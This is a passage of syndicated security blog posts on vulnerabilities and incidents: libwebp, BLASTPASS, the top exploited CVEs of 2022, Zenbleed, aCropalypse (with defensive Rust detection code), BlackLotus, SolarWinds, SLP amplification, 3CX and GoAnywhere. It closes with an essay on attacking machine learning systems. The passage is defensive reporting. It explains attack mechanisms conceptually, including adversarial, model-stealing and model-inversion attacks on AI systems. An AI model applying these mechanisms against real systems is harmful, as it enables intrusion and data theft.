For each and every user, it demonstrates the need to keep all browsers, apps and operating systems up to date, and to install recommended security patches. All applications supporting WebP images need to be updated. We've updated our services.

At Cloudflare, we remain committed to enhancing the security of the internet, and incidents like these drive us to continually refine our processes and strengthen our partnerships within the global developer community. By working together, we can make the Internet a safer place for everyone.

Critical Vulnerability in libwebp Library

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/critical-vulnerability-in-libwebp-library.html

Both Apple and Google have recently reported critical vulnerabilities in their systems—iOS and Chrome, respectively—that are ultimately the result of the same vulnerability in the libwebp library:

On Thursday, researchers from security firm Rezillion published evidence that they said made it “highly likely” both indeed stemmed from the same bug, specifically in libwebp, the code library that apps, operating systems, and other code libraries incorporate to process WebP images.

Rather than Apple, Google, and Citizen Lab coordinating and accurately reporting the common origin of the vulnerability, they chose to use a separate CVE designation, the researchers said. The researchers concluded that “millions of different applications” would remain vulnerable until they, too, incorporated the libwebp fix. That, in turn, they said, was preventing automated systems that developers use to track known vulnerabilities in their offerings from detecting a critical vulnerability that’s under active exploitation.

Zero-Click Exploit in iPhones

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/zero-click-exploit-in-iphones.html

Make sure you update your iPhones:

Citizen Lab says two zero-days fixed by Apple today in emergency security updates were actively abused as part of a zero-click exploit chain (dubbed BLASTPASS) to deploy NSO Group’s Pegasus commercial spyware onto fully patched iPhones.

The two bugs, tracked as CVE-2023-41064 and CVE-2023-41061, allowed the attackers to infect a fully-patched iPhone running iOS 16.6 and belonging to a Washington DC-based civil society organization via PassKit attachments containing malicious images.

“We refer to the exploit chain as BLASTPASS. The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim,” Citizen Lab said.

“The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim.”

Inconsistencies in the Common Vulnerability Scoring System (CVSS)

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/inconsistencies-in-the-common-vulnerability-scoring-system-cvss.html

Interesting research:

Shedding Light on CVSS Scoring Inconsistencies: A User-Centric Study on Evaluating Widespread Security Vulnerabilities

Abstract: The Common Vulnerability Scoring System (CVSS) is a popular method for evaluating the severity of vulnerabilities in vulnerability management. In the evaluation process, a numeric score between 0 and 10 is calculated, 10 being the most severe (critical) value. The goal of CVSS is to provide comparable scores across different evaluators. However, previous works indicate that CVSS might not reach this goal: If a vulnerability is evaluated by several analysts, their scores often differ. This raises the following questions: Are CVSS evaluations consistent? Which factors influence CVSS assessments? We systematically investigate these questions in an online survey with 196 CVSS users. We show that specific CVSS metrics are inconsistently evaluated for widespread vulnerability types, including Top 3 vulnerabilities from the ”2022 CWE Top 25 Most Dangerous Software Weaknesses” list. In a follow-up survey with 59 participants, we found that for the same vulnerabilities from the main study, 68% of these users gave different severity ratings. Our study reveals that most evaluators are aware of the problematic aspects of CVSS, but they still see CVSS as a useful tool for vulnerability assessment. Finally, we discuss possible reasons for inconsistent evaluations and provide recommendations on improving the consistency of scoring.

Here’s a summary of the research.

Spyware Vendor Hacked

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/spyware-vendor-hacked.html

A Brazilian spyware app vendor was hacked by activists:

In an undated note seen by TechCrunch, the unnamed hackers described how they found and exploited several security vulnerabilities that allowed them to compromise WebDetetive’s servers and access its user databases. By exploiting other flaws in the spyware maker’s web dashboard—used by abusers to access the stolen phone data of their victims—the hackers said they enumerated and downloaded every dashboard record, including every customer’s email address.

The hackers said that dashboard access also allowed them to delete victim devices from the spyware network altogether, effectively severing the connection at the server level to prevent the device from uploading new data. “Which we definitely did. Because we could. Because #fuckstalkerware,” the hackers wrote in the note.

The note was included in a cache containing more than 1.5 gigabytes of data scraped from the spyware’s web dashboard. That data included information about each customer, such as the IP address they logged in from and their purchase history. The data also listed every device that each customer had compromised, which version of the spyware the phone was running, and the types of data that the spyware was collecting from the victim’s phone.

Unmasking the top exploited vulnerabilities of 2022

Post Syndicated from Himanshu Anand original http://blog.cloudflare.com/unmasking-the-top-exploited-vulnerabilities-of-2022/

Unmasking the top exploited vulnerabilities of 2022

Unmasking the top exploited vulnerabilities of 2022

The Cybersecurity and Infrastructure Security Agency (CISA) just released a report highlighting the most commonly exploited vulnerabilities of 2022. With our role as a reverse proxy to a large portion of the Internet, Cloudflare is in a unique position to observe how the Common Vulnerabilities and Exposures (CVEs) mentioned by CISA are being exploited on the Internet.

We wanted to share a bit of what we’ve learned.

Based on our analysis, two CVEs mentioned in the CISA report are responsible for the vast majority of attack traffic seen in the wild: Log4J and Atlassian Confluence Code Injection. Although CISA/CSA discuss a larger number of vulnerabilities in the same report, our data clearly suggests a major difference in exploit volume between the top two and the rest of the list.

The top CVEs for 2022

Looking at the volume of requests detected by WAF Managed Rules that were created for the specific CVEs listed in the CISA report, we rank the vulnerabilities in order of prevalence:

Popularity rank

Description

CVEs

1. Improper Input Validation caused Remote Code execution in Apache Log4j logging library

Log4J

CVE-2021-44228

2. Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability

Atlassian Confluence Code Injection

CVE-2022-26134

3. 3 issues were combined together to achieve Remote Code execution also known as ProxyShell

Microsoft Exchange servers

CVE-2021-34473, CVE-2021-31207, CVE-2021-34523

4. undisclosed requests may bypass iControl REST authentication and run arbitrary code

BIG-IP F5

CVE-2022-1388

5. 2 issues were combined to together to achieve remote Root

VMware

CVE-2022-22954

CVE-2022-22960

6. Remote Code execution Issue in Confluence Server and Data Center

Atlassian Confluence 0-day

CVE-2021-26084

Topping the list is Log4J (CVE-2021-44228). This isn’t surprising, as this is likely one of the most high impact exploits we have seen in decades — leading to full remote compromise. The second most exploited vulnerability is the Atlassian Confluence Code Injection (CVE-2022-26134).

In third place we find the combination of three CVEs targeting Microsoft Exchange servers (CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523). In fourth is a BIG-IP F5 exploit (CVE-2022-1388) followed by the combination of two VMware vulnerabilities (CVE-2022-22954 and CVE-2022-22960). Our list ends with another Atlassian Confluence 0-day (CVE-2021-26084).

When comparing the attack volume for these five groups, we immediately notice that one vulnerability stands out. Log4J is more than an order of magnitude more exploited than the runner up (Atlassian Confluence Code Injection); and all the remaining CVEs are even lower. Although the CISA/CSA report groups all these vulnerabilities together, we think that there are really two groups: one dominant CVE (Log4J), and a secondary group of comparable 0-days. Each of the two groups have similar attack volume.

The chart below, in logarithmic scale, clearly shows the difference in popularity.

Unmasking the top exploited vulnerabilities of 2022

CVE-2021-44228: Log4J

The first on our list is the notorious CVE-2021-44228 — better known as the Log4j vulnerability. This flaw caused significant disturbance in the cyber world in 2021, and continues to be exploited extensively.

Cloudflare released new managed rules within hours after the vulnerability was made public. We also released updated detections in the following days (blog). Overall, we released rules in three stages:

The rules we deployed detect the exploit in four categories:

  • Log4j Headers: Attack pattern in HTTP header
  • Log4j Body: Attack pattern in HTTP Body
  • Log4j URI: Attack Pattern in URI
  • Log4j Body Obfuscation: Obfuscated Attack pattern

We have found that Log4J attacks in HTTP Headers are more common than in HTTP bodies. The graph below shows the persistence of exploit attempts for this vulnerability over time, with clear peaks and growth into July 2023 (time of writing).

Unmasking the top exploited vulnerabilities of 2022

Due to the high impact of this vulnerability, to step up and lead the charge for a safer, better Internet, on March 15, 2022 Cloudflare announced that all plans (including Free) would get WAF Managed Rules for high-impact vulnerabilities. These free rules tackle high-impact vulnerabilities such as the Log4J exploit, the Shellshock vulnerability, and various widespread WordPress exploits. Every business or personal website, regardless of size or budget, can protect their digital assets using Cloudflare’s WAF.

The full security advisory for Log4J published by Apache Software Foundation can be found here.

CVE-2022-26134: Atlassian Confluence Code Injection

A code injection vulnerability that afflicted Atlassian Confluence was the second most exploited CVE in 2022. This exploit posed a threat to entire systems, leaving many businesses at the mercy of attackers. This is an indication of how critical knowledge-based systems have become in managing information within organizations. Attackers are targeting these systems as they recognize how  important they are.. In response, the Cloudflare WAF team rolled out two emergency releases to protect its customers:

As part of these releases, two rules were made available to all WAF users:

  • Atlassian Confluence – Code Injection – CVE:CVE-2022-26134
  • Atlassian Confluence – Code Injection – Extended – CVE:CVE-2022-26134

The graph below displays the number of hits received each day, showing a clear peak followed by a gradual decline as systems were patched and secured.

Both Log4J and Confluence Code Injection show some seasonality, where a higher volume of attacks is carried out between September / November 2022 until March 2023. This likely reflects campaigns that are managed by attackers that are still attempting to exploit this vulnerability (an ongoing campaign is visible towards the end of July 2023).

Unmasking the top exploited vulnerabilities of 2022

Security advisory for reference.

CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523: Microsoft Exchange SSRF and RCE Vulnerabilities

Three previously unknown bugs were chained together to achieve a Remote Code Execution (RCE) 0-day attack. Given how widely adopted Microsoft Exchange servers are, these exploits posed serious threats to data security and business operations across all industries, geographies and sectors.

Cloudflare WAF published a rule for this vulnerability with the Emergency Release: March 3, 2022 that contained the rule Microsoft Exchange SSRF and RCE vulnerability – CVE:CVE-2022-41040, CVE:CVE-2022-41082.

The trend of these attacks over the past year can be seen in the graph below.

Unmasking the top exploited vulnerabilities of 2022

Security advisories for reference: CVE-2021-34473, CVE-2021-31207 and CVE-2021-34523.

CVE-2022-1388: RCE in BIG-IP F5

This particular security vulnerability can be exploited where an unauthenticated adversary has network connectivity to the BIG-IP system (the F5 product name of a group of application security and performance solutions). Either via the management interface or self-assigned IP addresses the attacker can execute unrestricted system commands.

Cloudflare did an emergency release to detect this issue (Emergency Release: May 5, 2022) with the rule Command Injection – RCE in BIG-IP – CVE:CVE-2022-1388.

There is a relatively persistent pattern of exploitation without signs of specific campaigns, with the exception of a spike occurring in late June 2023.

Unmasking the top exploited vulnerabilities of 2022
a

F5 security advisory for reference.

CVE-2022-22954: VMware Workspace ONE Access and Identity Manager Server-side Template Injection Remote Code Execution Vulnerability

With this vulnerability, an attacker can remotely trigger a server-side template injection that may result in remote code execution. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user. Later, this issue was combined with CVE-2022-22960 (which was a Local Privilege Escalation Vulnerability (LPE) issue). In combination, these two vulnerabilities allowed remote attackers to execute commands with root privileges.

Cloudflare WAF published a rule for this vulnerability: Release: May 5, 2022. Exploit attempt graph over time shown below.

Unmasking the top exploited vulnerabilities of 2022

VMware Security advisory.

CVE-2021-26084: Confluence Server Webwork OGNL injection

An OGNL injection vulnerability was found that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. Cloudflare WAF performed an emergency release for this vulnerability on September 9, 2022. When compared to the other CVEs discussed in this post, we have not observed a lot of exploits over the past year.

Unmasking the top exploited vulnerabilities of 2022

Official security advisory.

Recommendations for enhanced protection

We recommend all server admins to keep their software updated when fixes become available. Cloudflare customers — including those on our free tier — can leverage new rules addressing CVEs and 0-day threats, updated weekly in the Managed Ruleset. High-risk CVEs may even prompt emergency releases. In addition to this, Enterprise customers have access to the WAF Attack Score: an AI-powered detection feature that supplements traditional signature-based rules, identifying unknown threats and bypass attempts. With the combined strength of rule-based and AI detection, Cloudflare offers robust defense against known and emerging threats.

Conclusions

Cloudflare’s data is able to augment CISA’s vulnerability report — of note, we see attempts to exploit the top two vulnerabilities that are several orders of magnitude more compared to the remainder of the list. Organizations should focus their software patching efforts based on the list provided. It is, of course, important to note that all software should be patched, and good WAF implementations will ensure additional security and “buy time” for underlying systems to be secured for both existing and future vulnerabilities.

How Cloudflare is staying ahead of the AMD Zen vulnerability known as “Zenbleed”

Post Syndicated from Derek Chamorro original http://blog.cloudflare.com/zenbleed-vulnerability/

How Cloudflare is staying ahead of the AMD Zen vulnerability known as “Zenbleed”

How Cloudflare is staying ahead of the AMD Zen vulnerability known as “Zenbleed”

Google Project Zero revealed a new flaw in AMD's Zen 2 processors in a blog post today. The 'Zenbleed' flaw affects the entire Zen 2 product stack, from AMD's EPYC data center processors to the Ryzen 3000 CPUs, and can be exploited to steal sensitive data stored in the CPU, including encryption keys and login credentials. The attack can even be carried out remotely through JavaScript on a website, meaning that the attacker need not have physical access to the computer or server.

Cloudflare’s network includes servers using AMD’s Zen line of CPUs. We have patched our entire fleet of potentially impacted servers with AMD’s microcode to mitigate this potential vulnerability. While our network is now protected from this vulnerability, we will continue to monitor for any signs of attempted exploitation of the vulnerability and will report on any attempts we discover in the wild. To better understand the Zenbleed vulnerability, read on.

Background

Understanding how a CPU executes programs is crucial to comprehending the attack's workings. The CPU works with an arithmetic processing unit called the ALU. The ALU is used to perform mathematical tasks. Operations like addition, multiplication, and floating-point calculations fall under this category. The CPU's clock signal controls the application-specific digital circuitry that the ALU uses to carry out these functions.

For data to reach  the ALU, it has to pass through a series of storage systems. These include secondary memory, primary memory, cache memory, and CPU registers. Since the registers of the CPU are the target of this attack, we will go into a little more depth. Depending on the design of the computer, the CPU registers can store either 32 or 64 bits of information. The ALU can access the data in these registers and complete the operation.

As the demands on CPUs have increased, there has been a need for faster ways to perform calculations. Advanced Vector Extensions (or AVX) were developed to speed up the processing of large data sets by applications. AVX are extensions to the x86 instruction set architecture, which are relevant to x86-based CPUs from Intel and AMD. With the help of compatible software and the extra instruction set, compatible processors could handle more complex tasks. The primary motivation for developing this instruction set was to speed up operations associated with data compression, image processing, and cryptographic computations.

The vector data used by AVX instructions is stored in 16 YMM registers, each of which is 256 bits in size. The Y-register in the XMM register set is where the 128-bit values are stored, hence the name. Instructions from the arithmetic, logic, and trigonometry families of the AVX standard all make use of the YMM registers. They can also be used to keep masks, data that is used to filter out certain vector components.

Vectorized operations can be executed with great efficiency using the YMM registers. Applications that process large amounts of data stand to gain significantly from them, but they are increasingly the focus of malicious activity.

The attack

Speculative execution attacks have previously been used to compromise CPU registers. These are an attack variant that takes advantage of the speculative execution capabilities of modern CPUs. Computer processors use a method called speculative execution to speed up processing times. A CPU will execute an instruction speculatively if it has no way of knowing whether or not it will be executed. If it turns out that the CPU was unable to carry out the instruction, it will simply discard the data.

Because of their potential use for storing private information, AVX registers are especially susceptible to these kinds of attacks. Cryptographic keys and passwords, for instance, could be accessed by an attacker via a speculative execution attack on the AVX registers.

As mentioned above, Project Zero discovered a vulnerability in AMD's Zen 2-architecture-based CPUs, wherein data from another process and/or thread could be stored in the YMM registers, a 256-bit series of extended registers, potentially allowing an attacker access to sensitive information. This vulnerability is caused by a register not being written to 0 correctly under specific microarchitectural circumstances. Although this error is associated with speculative execution, it is not a side channel vulnerability.

This attack works by manipulating register files to force a mispredicted command. First, there is a trigger to XMM Register Merge Optimization2, which ironically is a hardware mitigation that can be used to protect against speculative execution attacks, followed by a register remapping (a technique used in computer processor design to resolve name conflicts between physical registers and logical registers) and then a mispredicted instruction call to vzeroupper, an instruction that is used to zero the upper half of the YMM and ZMM registers.

Since the register file is shared by all the processes running on the same physical core, this exploit can be used to eavesdrop on even the most fundamental system operations by monitoring the data being transferred between the CPU and the rest of the computer.

Fixing the bleed

Because of the exact timing for this to successfully execute, this vulnerability, CVE-2023-20593, is classified with a CVSS score of 6.5 (Medium). AMD's mitigation is implemented via the MSR register, which turns off a floating point optimization that otherwise would have allowed a move operation.

The following microcode updates have applied to our entire server fleet that contain potentially affected AMD Zen processors. We have seen no evidence of the bug being exploited and were able to patch our entire network within hours of the vulnerability’s disclosure. We will continue to monitor traffic across our network for any attempts to exploit the bug and report on our findings.

How Cloudflare Images addressed the aCropalypse vulnerability

Post Syndicated from Nicholas Skehin original http://blog.cloudflare.com/how-cloudflare-images-addressed-the-acropalypse-vulnerability/

How Cloudflare Images addressed the aCropalypse vulnerability

How Cloudflare Images addressed the aCropalypse vulnerability

Acropalypse (CVE-2023-21036) is a vulnerability caused by image editing tools failing to truncate images when editing has made them smaller, most often seen when images are cropped. This leaves remnants of the cropped contents written in the file after the image has finished. The remnants (written in a ‘trailer’ after the end-of-image marker) are ignored by most software when reading the image, but can be used to partially reconstruct the original image by an attacker.

The general class of vulnerability can, in theory, affect any image format if it ignores data written after the end of the image. In this case the applications affected were the ‘Markup’ screenshot editor that shipped with Google Pixel phones from the Pixel 3 (saving its images in the PNG format) and the Windows Snipping tool (with both PNG and JPEG formats).

Our customers deliver their images using Cloudflare Images products and may have images that are affected. We would like to ensure their images are protected from this vulnerability if they have been edited using a vulnerable editor.

As a concrete example, imagine a Cloudflare customer running a social network, delivering images using Cloudflare Images. A user of the social network might take a screenshot of an invoice containing their address after ordering a product, crop their address out and share the cropped image on the social network. If the image was cropped using an editor affected by aCropalypse an attacker would be able to recover their address, violating their expectation of privacy.

How Cloudflare Images products works

Cloudflare Images and Image Resizing use a proxy as the upstream for requests. This proxy fetches the original image (from either Cloudflare Images storage or the customer’s upstream), applies any transformations (from the variant definition for Cloudflare Images, or from the URL/worker parameters for Image Resizing) and then responds with the transformed image.

This naturally provides protection against aCropalypse for our customers: the proxy will ignore any trailing data in the input, so it won’t be present in the re-encoded image.

However, for certain requests, the proxy might respond with the original. This occurs when two conditions hold: the original can satisfy the request and the re-encoded image has a larger file size. The original satisfies the request if we can guarantee that if the requested format is supported the original format will be supported, it has the same dimensions, it doesn’t have any metadata that needs stripping and it doesn’t have any other transformations such as sharpening or overlays.

Even if the original can satisfy the request, it is fairly unlikely the original will be smaller for images affected by aCropalypse as the leaked information in the trailer will increase the file size. So Cloudflare Images and Image Resizing should provide protection against aCropalypse without adding any additional mitigations.

That being said, we couldn’t guarantee that images affected by aCropalypse would always be re-encoded. We wanted to be able to offer this guarantee for customers of Cloudflare Images and Image Resizing.

How we addressed the issue for JPEG and PNG file format

To ensure that no images with a trailer will ever be passed through, we can add another requirement to reply with the original image — if the original image is a PNG or a JPEG (so might have been affected by aCropalypse), it must not have a trailer. Then we just need to be able to detect trailers for both formats.

As a first idea we might consider simply checking that the image ends with the correct end-of-image marker, which for JPEG is the byte sequence [0xFF 0xD9] and for PNG is the byte sequence [0x00 0x00 0x00 0x00 0x49 0x45 0x4E 0x44 0xAE 0x42 0x60 0x82]. But this won’t work for images affected by aCropalypse: because the original image was a valid image, the trailer that results from overwriting the start of the file will be the end of a valid image. We also can’t check whether there is more than one end-of-image marker in the file; both formats have chunks of variable-length bytestrings in which the end-of-image marker could appear. We need to do it properly by parsing the image’s structure and checking there is no data after its end.

For JPEGs, we use a Rust wrapper of the library libjpeg-turbo for decoding. Libjpeg-turbo allows fine control of resource usage; for example it allows decompressing and re-compressing a JPEG file a scanline at a time. This flexibility allows us to easily detect trailers using the library’s API: we just have to check that once we have consumed the end-of-image marker all of the input has been consumed. In our proxy we use an in-memory buffer as input, so we can check that there are no bytes left in the buffer:

pub fn consume_eoi_marker(&mut self) -> bool {
    // Try to consume the EOI marker of the image
    unsafe {
        (ffi::jpeg_input_complete(&self.dec.cinfo) == 1) || {
            ffi::jpeg_consume_input(&mut self.dec.cinfo);
            ffi::jpeg_input_complete(&self.dec.cinfo) == 1
        }
    }
}

pub fn has_trailer(&mut self) -> io::Result<bool> {
    if self.consume_eoi_marker() {
        let src = unsafe {
            NonNull::new(self.dec.cinfo.src)
                .ok_or_else(|| {
                    io::Error::new(
                        io::ErrorKind::Other,
                        "source manager not set".to_string()
                    )
                })?
                .as_ref()
        };

        // We have a trailer if we have any bytes left over in the buffer
        Ok(src.bytes_in_buffer != 0)
    } else {
        // We didn't consume the EOI - we can't say if there is a trailer
        Err(io::Error::new(
            io::ErrorKind::Other,
            "EOI not reached".to_string(),
        ))
    }
}

For PNGs, we use the lodepng library. This has a much simpler API surface that decodes an image in one shot when you call lodepng_decode. This doesn’t tell us how many bytes were read or provide an interface to detect if we have a trailer.

Luckily the PNG format has a very consistent and simple internal structure:

  • First the PNG prelude, the byte sequence [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]
  • Then a series of chunks, which each consist of
  1. 4 bytes length as a big-endian integer N
  2. 4 bytes chunk type
  3. N bytes of data (whose meaning depends on the chunk type)
  4. 4 bytes of checksum — CRC-32 of the type and data

The file is terminated by a chunk of type IEND with no data.

As the format is so regular, it’s easy to write a separate parser that just reads the prelude, loops through the chunks until we see IEND, and then checks if we have any bytes left. We can perform this check after decoding the image with lodepng, as this allows us to skip validating the checksums as lodepng has already checked them for us:

const PNG_PRELUDE: &[u8] = &[0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];

enum ChunkStatus {
    SeenEnd { has_trailer: bool },
    MoreChunks,
}

fn consume_chunks_until_iend(buf: &[u8]) -> Result<(ChunkStatus, &[u8]), &'static str> {
    let (length_bytes, buf) = consume(buf, 4)?;
    let (chunk_type, buf) = consume(buf, 4)?;

    // Infallible: We've definitely consumed 4 bytes
    let length = u32::from_be_bytes(length_bytes.try_into().unwrap());

    let (_data, buf) = consume(buf, length as usize)?;

    let (_checksum, buf) = consume(buf, 4)?;

    if chunk_type == b"IEND" && buf.is_empty() {
        Ok((ChunkStatus::SeenEnd { has_trailer: false }, buf))
    } else if chunk_type == b"IEND" && !buf.is_empty() {
        Ok((ChunkStatus::SeenEnd { has_trailer: true }, buf))
    } else {
        Ok((ChunkStatus::MoreChunks, buf))
    }
}

pub(crate) fn has_trailer(png_data: &[u8]) -> Result<bool, &'static str> {
    let (magic, mut buf) = consume(png_data, PNG_PRELUDE.len())?;

    if magic != PNG_PRELUDE {
        return Err("expected prelude");
    }

    loop {
        let (status, tmp_buf) = consume_chunks_until_iend(buf)?;
        buf = tmp_buf;
        if let ChunkStatus::SeenEnd { has_trailer } = status {
            return Ok(has_trailer)
        }
    }
}

Conclusion

Customers using Cloudflare Images or Image Resizing products are protected against the aCropalypse vulnerability. The Images team addressed the vulnerability in a way that didn’t require any changes to the original images or cause any increased latency or regressions for customers.

Microsoft Secure Boot Bug

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/05/microsoft-secure-boot-bug.html

Microsoft is currently patching a zero-day Secure-Boot bug.

The BlackLotus bootkit is the first-known real-world malware that can bypass Secure Boot protections, allowing for the execution of malicious code before your PC begins loading Windows and its many security protections. Secure Boot has been enabled by default for over a decade on most Windows PCs sold by companies like Dell, Lenovo, HP, Acer, and others. PCs running Windows 11 must have it enabled to meet the software’s system requirements.

Microsoft says that the vulnerability can be exploited by an attacker with either physical access to a system or administrator rights on a system. It can affect physical PCs and virtual machines with Secure Boot enabled.

That’s important. This is a nasty vulnerability, but it takes some work to exploit it.

The problem with the patch is that it breaks backwards compatibility: “…once the fixes have been enabled, your PC will no longer be able to boot from older bootable media that doesn’t include the fixes.”

And:

Not wanting to suddenly render any users’ systems unbootable, Microsoft will be rolling the update out in phases over the next few months. The initial version of the patch requires substantial user intervention to enable—you first need to install May’s security updates, then use a five-step process to manually apply and verify a pair of “revocation files” that update your system’s hidden EFI boot partition and your registry. These will make it so that older, vulnerable versions of the bootloader will no longer be trusted by PCs.

A second update will follow in July that won’t enable the patch by default but will make it easier to enable. A third update in “first quarter 2024” will enable the fix by default and render older boot media unbootable on all patched Windows PCs. Microsoft says it is “looking for opportunities to accelerate this schedule,” though it’s unclear what that would entail.

So it’ll be almost a year before this is completely fixed.

SolarWinds Detected Six Months Earlier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/05/solarwinds-detected-six-months-earlier.html

New reporting from Wired reveals that the Department of Justice detected the SolarWinds attack six months before Mandiant detected it in December 2020, but didn’t realize what it detected—and so ignored it.

WIRED can now confirm that the operation was actually discovered by the DOJ six months earlier, in late May 2020­—but the scale and significance of the breach wasn’t immediately apparent. Suspicions were triggered when the department detected unusual traffic emanating from one of its servers that was running a trial version of the Orion software suite made by SolarWinds, according to sources familiar with the incident. The software, used by system administrators to manage and configure networks, was communicating externally with an unfamiliar system on the internet. The DOJ asked the security firm Mandiant to help determine whether the server had been hacked. It also engaged Microsoft, though it’s not clear why the software maker was also brought onto the investigation.

[…]

Investigators suspected the hackers had breached the DOJ server directly, possibly by exploiting a vulnerability in the Orion software. They reached out to SolarWinds to assist with the inquiry, but the company’s engineers were unable to find a vulnerability in their code. In July 2020, with the mystery still unresolved, communication between investigators and SolarWinds stopped. A month later, the DOJ purchased the Orion system, suggesting that the department was satisfied that there was no further threat posed by the Orion suite, the sources say.

EDITED TO ADD (5/4): More details about the SolarWinds attack from Wired.com.

SLP: a new DDoS amplification vector in the wild

Post Syndicated from Alex Forster original https://blog.cloudflare.com/slp-new-ddos-amplification-vector/

SLP: a new DDoS amplification vector in the wild

SLP: a new DDoS amplification vector in the wild

Earlier today, April 25, 2023, researchers Pedro Umbelino at Bitsight and Marco Lux at Curesec published their discovery of CVE-2023-29552, a new DDoS reflection/amplification attack vector leveraging the SLP protocol. If you are a Cloudflare customer, your services are already protected from this new attack vector.

Service Location Protocol (SLP) is a “service discovery” protocol invented by Sun Microsystems in 1997. Like other service discovery protocols, it was designed to allow devices in a local area network to interact without prior knowledge of each other. SLP is a relatively obsolete protocol and has mostly been supplanted by more modern alternatives like UPnP, mDNS/Zeroconf, and WS-Discovery. Nevertheless, many commercial products still offer support for SLP.

Since SLP has no method for authentication, it should never be exposed to the public Internet. However, Umbelino and Lux have discovered that upwards of 35,000 Internet endpoints have their devices’ SLP service exposed and accessible to anyone. Additionally, they have discovered that the UDP version of this protocol has an amplification factor of up to 2,200x, which is the third largest discovered to-date.

Cloudflare expects the prevalence of SLP-based DDoS attacks to rise significantly in the coming weeks as malicious actors learn how to exploit this newly discovered attack vector.

Cloudflare customers are protected

If you are a Cloudflare customer, our automated DDoS protection system already protects your services from these SLP amplification attacks.
To avoid being exploited to launch the attacks, if you are a network operator, you should ensure that you are not exposing the SLP protocol directly to the public Internet. You should consider blocking UDP port 427 via access control lists or other means. This port is rarely used on the public Internet, meaning it is relatively safe to block without impacting legitimate traffic. Cloudflare Magic Transit customers can use the Magic Firewall to craft and deploy such rules.

North Korea Hacking Cryptocurrency Sites with 3CX Exploit

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/04/north-korea-hacking-cryptocurrency-sites-with-3cx-exploit.html

News:

Researchers at Russian cybersecurity firm Kaspersky today revealed that they identified a small number of cryptocurrency-focused firms as at least some of the victims of the 3CX software supply-chain attack that’s unfolded over the past week. Kaspersky declined to name any of those victim companies, but it notes that they’re based in “western Asia.”

Security firms CrowdStrike and SentinelOne last week pinned the operation on North Korean hackers, who compromised 3CX installer software that’s used by 600,000 organizations worldwide, according to the vendor. Despite the potentially massive breadth of that attack, which SentinelOne dubbed “Smooth Operator,” Kaspersky has now found that the hackers combed through the victims infected with its corrupted software to ultimately target fewer than 10 machines­—at least as far as Kaspersky could observe so far—­and that they seemed to be focusing on cryptocurrency firms with “surgical precision.”

Mass Ransomware Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/03/mass-ransomware-attack.html

A vulnerability in a popular data transfer tool has resulted in a mass ransomware attack:

TechCrunch has learned of dozens of organizations that used the affected GoAnywhere file transfer software at the time of the ransomware attack, suggesting more victims are likely to come forward.

However, while the number of victims of the mass-hack is widening, the known impact is murky at best.

Since the attack in late January or early February—the exact date is not known—Clop has disclosed less than half of the 130 organizations it claimed to have compromised via GoAnywhere, a system that can be hosted in the cloud or on an organization’s network that allows companies to securely transfer huge sets of data and other large files.

Attacking Machine Learning Systems

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/02/attacking-machine-learning-systems.html

The field of machine learning (ML) security—and corresponding adversarial ML—is rapidly advancing as researchers develop sophisticated techniques to perturb, disrupt, or steal the ML model or data. It’s a heady time; because we know so little about the security of these systems, there are many opportunities for new researchers to publish in this field. In many ways, this circumstance reminds me of the cryptanalysis field in the 1990. And there is a lesson in that similarity: the complex mathematical attacks make for good academic papers, but we mustn’t lose sight of the fact that insecure software will be the likely attack vector for most ML systems.

We are amazed by real-world demonstrations of adversarial attacks on ML systems, such as a 3D-printed object that looks like a turtle but is recognized (from any orientation) by the ML system as a gun. Or adding a few stickers that look like smudges to a stop sign so that it is recognized by a state-of-the-art system as a 45 mi/h speed limit sign. But what if, instead, somebody hacked into the system and just switched the labels for “gun” and “turtle” or swapped “stop” and “45 mi/h”? Systems can only match images with human-provided labels, so the software would never notice the switch. That is far easier and will remain a problem even if systems are developed that are robust to those adversarial attacks.

At their core, modern ML systems have complex mathematical models that use training data to become competent at a task. And while there are new risks inherent in the ML model, all of that complexity still runs in software. Training data are still stored in memory somewhere. And all of that is on a computer, on a network, and attached to the Internet. Like everything else, these systems will be hacked through vulnerabilities in those more conventional parts of the system.

This shouldn’t come as a surprise to anyone who has been working with Internet security. Cryptography has similar vulnerabilities. There is a robust field of cryptanalysis: the mathematics of code breaking. Over the last few decades, we in the academic world have developed a variety of cryptanalytic techniques. We have broken ciphers we previously thought secure. This research has, in turn, informed the design of cryptographic algorithms. The classified world of the NSA and its foreign counterparts have been doing the same thing for far longer. But aside from some special cases and unique circumstances, that’s not how encryption systems are exploited in practice. Outside of academic papers, cryptosystems are largely bypassed because everything around the cryptography is much less secure.

I wrote this in my book, Data and Goliath:

The problem is that encryption is just a bunch of math, and math has no agency. To turn that encryption math into something that can actually provide some security for you, it has to be written in computer code. And that code needs to run on a computer: one with hardware, an operating system, and other software. And that computer needs to be operated by a person and be on a network. All of those things will invariably introduce vulnerabilities that undermine the perfection of the mathematics…

This remains true even for pretty weak cryptography. It is much easier to find an exploitable software vulnerability than it is to find a cryptographic weakness. Even cryptographic algorithms that we in the academic community regard as “broken”—meaning there are attacks that are more efficient than brute force—are usable in the real world because the difficulty of breaking the mathematics repeatedly and at scale is much greater than the difficulty of breaking the computer system that the math is running on.

ML systems are similar. Systems that are vulnerable to model stealing through the careful construction of queries are more vulnerable to model stealing by hacking into the computers they’re stored in. Systems that are vulnerable to model inversion—this is where attackers recover the training data through carefully constructed queries—are much more vulnerable to attacks that take advantage of unpatched vulnerabilities.

